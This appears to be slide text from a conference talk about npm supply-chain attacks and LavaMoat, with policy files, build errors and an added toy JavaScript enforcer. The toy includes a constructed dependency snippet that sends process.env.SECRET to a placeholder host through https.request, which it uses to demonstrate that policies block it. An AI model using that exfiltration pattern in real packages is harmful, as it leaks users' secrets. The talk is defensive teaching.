I run code from the Internet!


🌩️

@naugtur, 2023
npm logo gobble
Hello, we've found a malicious package version in your dependencies that…
you've been shipping to production for a week.

- npm audit

This new package looks odd. Got time to read it?

- socket.dev

🪄


How does it work?



Demo:
https://github.com/naugtur/i-run-code-from-the-internet
## Let's install ## that build tool
## Let's install
## that build tool

---

#### yo, there's an app for that!

package.json:

```json
{
  "scripts": {
    "generate-policy": "lavamoat build.js --auto",
    "build": "lavamoat build.js"
  }
}
```

---

#### the policy

./lavamoat/node/policy.json:

```json
{
  "that-eslint-plugin>evil-dependency": {
    "builtin": { "https.request": true },
    "globals": { "process.env": true }
  }
}
```

---

#### the policy

./lavamoat/node/policy.json:

```json
{
  "that-eslint-plugin>evil-dependency": {
    "builtin": { "https": false },
    "globals": { "process": false }
  }
}
```

---

```
$ npm run build
Error: LavaMoat - required node builtin package not in allowlist: package "evil-dependency" requested "https"
TypeError: Cannot read properties of undefined (reading 'env')
```
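An added illustration of what the two policy slides enforce; this is not LavaMoat's code and not from the deck. Real LavaMoat runs each package in an SES Compartment with hardened intrinsics. The toy below approximates the same rule with `new Function` parameters that shadow the host globals and a per-package `require` that only knows allowlisted builtins. The `host` object, the `evilSource` snippet, `example.invalid`, the `SECRET` variable and the `resources`-less policy entries are all constructed stand-ins, shaped like the slides' fragments.

```javascript
'use strict';
// Toy policy enforcer (not LavaMoat's implementation): a dependency gets a
// `require` and a set of globals derived from its policy entry, so asking for
// anything the policy denies fails instead of silently succeeding.

// Constructed host: stand-ins for Node builtins and globals, so nothing real is touched.
const host = {
  builtins: {
    https: {
      request: (url, body) => `request ${url} body=${body}`,
      get: (url) => `get ${url}`,
    },
    fs: { readFileSync: () => 'file contents' },
  },
  globals: {
    process: { env: { SECRET: 'constructed-secret' }, exit: () => 'exit' },
  },
};

// Copy only the members an allowlist names: "https.request": true exposes just
// https.request; "https": false, or no entry at all, exposes nothing.
function pick(hostObj, allowlist) {
  const out = {};
  for (const [path, allowed] of Object.entries(allowlist)) {
    if (allowed !== true) continue;
    const parts = path.split('.');
    let src = hostObj;
    let dst = out;
    for (let i = 0; i < parts.length; i++) {
      const key = parts[i];
      if (!(key in src)) break;                     // host has no such member
      if (i === parts.length - 1) {
        dst[key] = src[key];                        // leaf: expose exactly this member
      } else {
        if (dst[key] === undefined) dst[key] = {};  // fresh attenuated wrapper object
        src = src[key];
        dst = dst[key];
      }
    }
  }
  return out;
}

// A per-package `require` that only knows the builtins the policy allows.
function makeRequire(builtinPolicy, builtins) {
  const visible = pick(builtins, builtinPolicy);
  return function policyRequire(name) {
    if (!Object.prototype.hasOwnProperty.call(visible, name)) {
      throw new Error(
        `LavaMoat - required node builtin package not in allowlist: requested "${name}"`,
      );
    }
    return visible[name];
  };
}

// Run dependency source under a policy entry. Every host global name is shadowed
// by a parameter, so a denied global is `undefined` inside the package.
function runWithPolicy(source, entry) {
  const allowedGlobals = pick(host.globals, entry.globals || {});
  const names = Object.keys(host.globals);
  const values = names.map((name) => allowedGlobals[name]);
  const fn = new Function('require', ...names, `'use strict';\n${source}`);
  return fn(makeRequire(entry.builtin || {}, host.builtins), ...values);
}

// Constructed dependency code shaped like the "evil-dependency" on the slides.
const evilSource = `
  const https = require('https');
  return https.request('https://example.invalid/', process.env.SECRET);
`;

// The two policy entries from the slides.
const allowPolicy = { builtin: { 'https.request': true }, globals: { 'process.env': true } };
const denyPolicy = { builtin: { https: false }, globals: { process: false } };

function outcomeUnder(entry, source = evilSource) {
  try {
    return { ok: true, value: runWithPolicy(source, entry) };
  } catch (err) {
    return { ok: false, error: `${err.name}: ${err.message}` };
  }
}

console.log(outcomeUnder(allowPolicy));   // ok: the allowlisted call goes through
console.log(outcomeUnder(denyPolicy));    // "not in allowlist" error from require('https')
console.log(outcomeUnder(denyPolicy, 'return process.env.SECRET;')); // TypeError, process is undefined
```

Under the first policy the package can call `https.request` and read `process.env`, but `https.get` is not there, because the allowlist named only `https.request`. Under the second policy `require('https')` throws the same kind of "not in allowlist" error shown on the build slide, and `process.env` fails with a TypeError because `process` itself was not granted.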
# (╯°□°)╯︵ ┻━┻

# how ?!
### There's also a bundler

1. browserify based
2. webpack plugin (in BETA)

Wanna help with the plugin?

#### Open Beta hub here: [https://github.com/LavaMoat/LavaMoat/discussions/723](https://github.com/LavaMoat/LavaMoat/discussions/723)
### Want to know more?

[Earlier talk with more SES details](https://www.youtube.com/watch?v=Qjeh7Qo2u28)

[Mark Miller on F5 Tech Talks](https://www.youtube.com/watch?v=u-XETUbxNUU)
### But I promised I'll

![eval](./ilus/meme.jpg)

I'll help you set up LavaMoat in your project

@naugtur   naugtur.pl

naugtur.pl/training